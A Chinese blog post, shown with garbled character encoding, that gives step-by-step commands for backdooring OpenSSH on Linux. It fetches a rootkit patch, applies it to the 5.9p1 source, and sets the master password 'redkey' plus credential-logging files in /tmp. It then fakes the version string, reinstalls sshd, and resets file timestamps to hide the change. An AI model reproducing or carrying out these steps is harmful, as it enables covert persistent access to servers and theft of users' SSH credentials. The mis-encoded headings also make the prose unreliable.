Linux °²È«Ö®SSHºóÃÅ

http://redkey.blog.51cto.com/335290/1345091

Ò».²é¿´SSH°æ±¾

[root@redkey vmshare]# ssh -V

OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010

¶þ.ÏÂÔØSSH Ô´Âë°ü

Ô´Âë°ü£º

http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz

ºóÃÅÎļþ£º

http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz

Èý.±¸·ÝÔ­ÓÐsshÅäÖÃÎļþ

[root@redkey ~]# cp -p /etc/ssh/sshd_config{,.bak}

ËÄ.±àÒë°²×°

[root@redkey vmshare]# tar -xzvf openssh-5.9p1.tar.gz

[root@redkey vmshare]# tar -xzvf 0x06-openssh-5.9p1.patch.tar.gz

[root@redkey vmshare]# cd openssh-5.9p1.patch/

[root@redkey openssh-5.9p1.patch]# cp sshbd5.9p1.diff ../openssh-5.9p1

[root@redkey openssh-5.9p1.patch]# cd ../openssh-5.9p1

[root@redkey openssh-5.9p1]# patch < sshbd5.9p1.diff

patching fileauth.c

patching fileauth-pam.c

patching fileauth-passwd.c

patching filecanohost.c

patching fileincludes.h

patching filelog.c

patching fileservconf.c

patching filesshconnect2.c

patching filesshlogin.c

patching file version.hxiu

ÉèÖúóÃÅÃÜÂë"redkey"

[root@redkey openssh-5.9p1]# vim includes.h

175 int secret_ok;

176 FILE *f;

177 #define ILOG "/tmp/ilog"

178 #define OLOG "/tmp/olog"

179 #define SECRETPW "redkey"

180 #endif /* INCLUDES_H */

Ð޸İ汾ÐÅÏ¢(SSH_VERSION)£º

/* $OpenBSD: version.h,v1.62 2011/08/02 23:13:01 djm Exp $ */

#define SSH_VERSION "OpenSSH_5.3p1"

#define SSH_PORTABLE "p1"

#define SSH_RELEASE SSH_VERSION SSH_PORTABLE

±àÒë&°²×°

[root@redkey openssh-5.9p1]# ./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5

[root@redkey openssh-5.9p1]# make

[root@redkey openssh-5.9p1]# make install

Îå.»¹Ô­sshd_configÎļþʱ¼ä´Á

[root@redkey ssh]# touch -r sshd_config.bak ssh_config

Áù.ÖØÆô·þÎñ»òÖØÐÂÔØÈëÅäÖÃ

[root@redkey ssh]# service sshd reload

Æß.³£¼ûÎÊÌâ

1.ÐèÒª°²×°µÄÈí¼þ°ü

openssl openssl-devel pam-devel

2.±àÒë³£¼ûµÄÎÊÌâ

±àÒë¹ý³ÌÖпÉÄܳöÏֵı¨´í£º

configure: error: *** zlib.h missing ¨C pleaseinstall first or check config.log

#

#yum install zlib-devel

configure: error: *** Can'tfind recent OpenSSL libcrypto (see config.logfor details) ***

#

#yum install openssl openssl-devel